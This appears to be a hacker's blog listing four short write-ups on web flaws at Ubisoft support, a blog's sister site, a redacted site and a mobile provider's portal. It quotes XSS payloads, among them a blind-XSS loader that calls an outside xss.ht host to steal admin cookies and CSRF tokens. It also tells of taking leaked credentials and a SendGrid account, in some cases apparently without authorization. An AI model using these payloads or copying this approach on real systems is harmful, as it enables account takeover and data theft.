Posts

UBISOFT | BLIND XSS TO CUSTOMER SUPPORT PANEL TAKEOVER

Image
hey folks! hope y'all great , i recently found a XSS in support.ubisoft.com which lead  the attacker to takeover customer support panel :
Vulnerability : Cross Site Scripting Identifying Vulnerability : While i was facing a problem in Wd2 I goto know about http://support.ubi.com , I opened a ticket for that ,and i got the idea of why not test it out for xss  i send the following payload  :
<script>alert("XSS POC BY HX01");</script> and boom!


Exploitation : since the webapp was vulnerable to xss i added an payload from xsshunter.com  to steal the Admin Cookies,CSRF token etc :
"><script src=https://usociety.xss.ht></script> now time to make the victim visit the url:


since some of the admin cookies were httponly i wasn't able to login into it but however due to xsshunter i was able to get the Ip,CSRF token(which could have lead to compromise agent)& some tickets information,some players id due to another xss trigger :
Reported the …

MANGOBAAZ HACKED | XSS TO CREDENTIALS EXPOSURE TO PWN

Image
Vulnerabilities identified : XSS , IMPROPER ERROR HANDLING
hey folks! hope y'all are fine, i recently got access to a paki blog @mangobaazand here is the writeup how i was able to hack into.
INFORMATION GATHERING : while information gathering i came across to a website "hungerist.com" which was owned by mangobaaz and the signup page captured my antention so i selected it to peneterate.


IDENTIFYING VULNERABILITY : i added  the xss payload in the NAME Field : <script>alert("XSS BY HX01);</script> and BOOM! XSSED :

since i was trying to steal  cookies  i tried another payload  :

<iframe src=" jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e "></iframe> an xss didn't triggered but an error did:
since it was improper error handling it leaked some credentials :D including…

Directory Listing To Sensitive Files Exposure

Image
Vulnerability : Directory Listing   since the website is priva8  and couldn't be disclose lets name it Redacted.com While surfing across a website i came to know that website was vulnerable to Directory Listing . since the website was using Wordpress as the cms i knew i couldn't find something else as it was already uptodate and didnt found anything interesting at : Redacted.com/wp-content/uploads/ , i decided to enumerate the directories manually since i didn't had access to dirbuster at that time. i found out some dirs like Redacted.com/images,Redacted.com/assets, and the fishy one "Redacted.com/uploads ". the Redacted.com/uploads included alot of images and three dirs "stores,shipments,voucher :
 nothing saucy was found in "Redacted.com/uploads/stores" therefore i opened voucher and BOOM!  there were some backup files (not sure of it but were sensitive & left  public ) i.e *idh anyother screenshots as it was not ethical to* :
 and hence this…

Recon To Admin Creditionals Disclosure

Image
Vulnerability : Information Leakage due to improper error handling
It all started with a cup of tea and curiosity to hack into my Mobile network Provider . I ussually start my recon with the firing google dorks and Sniper . since the name of that company can't be disclose lets substitute it as xyz.com .

Firing this dork inurl: xyz i was able to get my target that web looklikes a VPBX portal for the marketing businesses  and call centers :

I tried Dirbuster but was not able to find anything and there were only default http & https ports were opened. since nothing else was left i tried giving a try to Request A Free Demo with fake details to avoid spam and BOOM! this error showed up : 
and this error leaked some creditionals  : 

TIME TO EXPLOIT : Since the DB was accessible through internal ip i wasn't able to exploit it however i got access to companies Sengrid Account which was enough :

Best Regards, @Hx01